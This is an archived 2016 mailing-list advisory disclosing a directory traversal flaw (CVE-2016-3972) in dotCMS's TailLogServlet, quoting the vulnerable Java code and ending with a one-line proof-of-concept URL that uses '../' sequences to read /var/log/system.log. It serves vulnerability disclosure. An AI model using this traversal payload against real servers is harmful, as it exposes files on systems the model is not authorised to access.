Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAA0JNpTZm42a_6D4TdOb=8H56y7dd-fewOCg3CmCA-a8TN=e8g@mail.gmail.com>
Date: Fri, 8 Apr 2016 11:07:35 +0800
From: xiong piaox <yahoo860201@...il.com>
To: fulldisclosure@...lists.org
Cc: bugs@...uritytracker.com, bugtraq@...urityfocus.com, 
	oss-security@...ts.openwall.com
Subject: [CVE-2016-3972]DotCMS Directory traversal vulnerability

Advisory: DotCMS Directory traversal vulnerability

Author: Piaox From Pingan Product Safety Group

Email: xiongyaofu351@...gan.com.cn

Affected Version: dotCMS 3.5 Beta(the latest version)



==========================

Vulnerability Description

Recetly, I found a Directory traversal vulnerability in ‘DotCMS'
program,  DotCMS is widely used in many companies.



Vulnerable file is: “com.dotmarketing.servlets.taillog.TailLogServlet.class”

File file = *null*;

    String tailLogLofFolder = *Config*.*getStringProperty*(
"TAIL_LOG_LOG_FOLDER", "./dotsecure/logs/");

    *try*

    {

      *if* (!tailLogLofFolder.endsWith(File.separator)) {

        tailLogLofFolder = tailLogLofFolder + File.separator;

      }

      file = *new* File(*FileUtil*.*getAbsolutlePath*(tailLogLofFolder +
fileName));

    }

    *catch* (Exception e)

    {

      *Logger*.*error*(getClass(), "unable to open log file '" +
tailLogLofFolder + fileName + "' please set the config variable
TAIL_LOG_LOG_FOLDER correctly");

    }

    *if* ((file == *null*) || (!file.exists()))

    {

      response.sendError(403);

      *AdminLogger*.*log*(*TailLogServlet*.*class*, "service", "Someone
tried to use the TailLogServlet to display a file not in the logs directory"
);

      *return*;

    }

    String regex = *Config*.*getStringProperty*("TAIL_LOG_FILE_REGEX");

//WEB-INF/classes/dotmarketing-config.properties:TAIL_LOG_FILE_REGEX=.*\.log$|.*\.out$

    *if* (!*UtilMethods*.*isSet*(regex)) {

      regex = "!.*";

    }

*if* (!Pattern.compile(regex).matcher(fileName).matches()) {

//Only detects whether the file extension .log end,lead ,caused Directory
traversal vulnerability.

      *return*;

    }

    response.setContentType("text/html;charset=UTF-8");



    ServletOutputStream out = response.getOutputStream();



    out.print("<html><head><title>dotCMS Log</title><style
type='text/css'>@import '/html/css/dot_admin.css';</style><script>var
working =false;function
doS(){if(!working){working=true;if(parent.document.getElementById('scrollMe').checked){dh=document.body.scrollHeight;ch=document.body.clientHeight;if(dh>ch){moveme=dh-ch;window.scrollTo(0,moveme);}}working=false;}}</script></head><body
class='tailerBody'>");



    out.flush();



    *Tailer* tailer = *null*;

    *long* startPosition = file.length() - 5000L < 0L ? 0L : file.length()
- 5000L;



    *MyTailerListener* listener = *new* MyTailerListener(*null*);

    listener.*handle*("Tailing " + fileName);

    listener.*handle*("----------------------------- ");

    tailer = *new* *Tailer*(file, listener, 1000L);

    tailer.*setStartPosition*(startPosition);

    *MyTailerThread* thread = *new* *MyTailerThread*(tailer);



    String name = *null*;

    *for* (*int* i = 0; i < 1000; i++)

    {

      name = "LogTailer" + i + ":" + fileName;

      Thread t = *ThreadUtils*.*getThread*(name);

      *if* (t == *null*) {

        *break*;

      }

      *if* (i > 100) {

        *throw* *new* ServletException("Too many Logger threads");

      }

    }



==========================

POC && EXP

==========================

1. Login

2.
http://localhost:8080/dotTailLogServlet/?fileName=../../../../../../../../var/log/system.log

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.